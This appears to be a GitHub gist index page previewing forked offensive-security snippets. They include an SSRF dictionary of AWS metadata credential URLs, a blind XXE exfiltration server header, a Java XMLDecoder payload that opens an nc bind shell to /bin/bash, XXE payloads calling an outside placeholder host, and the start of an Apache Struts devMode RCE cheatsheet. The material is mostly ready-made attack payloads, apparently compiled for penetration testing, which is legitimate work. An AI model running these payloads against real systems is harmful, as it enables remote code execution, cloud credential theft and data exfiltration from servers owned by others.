Skip to content

Instantly share code, notes, and snippets.

View sbzo's full-sized avatar

RLobo sbzo

8 followers · 4 following
View GitHub Profile
@sbzo
sbzo / cloud_metadata.txt
Created May 7, 2018 16:28 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@sbzo
sbzo / blindxxe.py
Created September 7, 2017 04:26 — forked from mgeeky/blindxxe.py
Blind XXE (External XML Entity) attacker's server - to be used in blind XXE data exfiltration (like in Play Framework or Ruby on Rails)
#!/usr/bin/python
#
# Simple Blind XXE server intended to handle incoming requests for
# malicious DTD file, that will subsequently ask for locally stored file,
# like file:///etc/passwd.
#
# This program has been tested with PlayFramework 2.1.3 XXE vulnerability,
# to be run as follows:
#
@sbzo
sbzo / java-XMLDecoder-RCE.md
Created September 7, 2017 04:26 — forked from mgeeky/java-XMLDecoder-RCE.md
Java Beans XMLDecoder XML-deserialization Remote Code Execution payloads

Java Beans XMLDecoder Remote Code Execution cheatsheet

Having a functionality of file upload or other function that is parsing input xml-type data that will later flow through the XMLDecoder component of Java Beans, one could try to play around it's known deserialization issue. In order to test that issue there should be specially crafted XML-payload used that would invoke arbitrary Java interfaces and methods with supplied parameters.

Payloads

When one would like to start a bind shell on the target machine, he could use the payload like the following one:

Runtime.getRuntime().exec(new java.lang.String[]{"/usr/bin/nc", "-l", "-p", "4444", "-e", "/bin/bash"});
@sbzo
sbzo / XXE_payloads
Created September 7, 2017 04:25 — forked from mgeeky/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@sbzo
sbzo / struts-cheatsheet.md
Created September 7, 2017 04:19 — forked from mgeeky/struts-cheatsheet.md
Apache Struts devMode Remote Code Execution cheatsheet

Apache Struts Remote Code Execution cheatsheet

Apacje Struts is a open source framework utilizing JavaEE web applications and encouraging to employ MVC (Model View Controller) architecture. When having the application developed in so-called devMode as set in the struts.xml file:

<constant name="struts.devMode" value="true" />

Then the middleware will be handling additional parameters passed to every function invocation.

Testing for Struts devMode enabled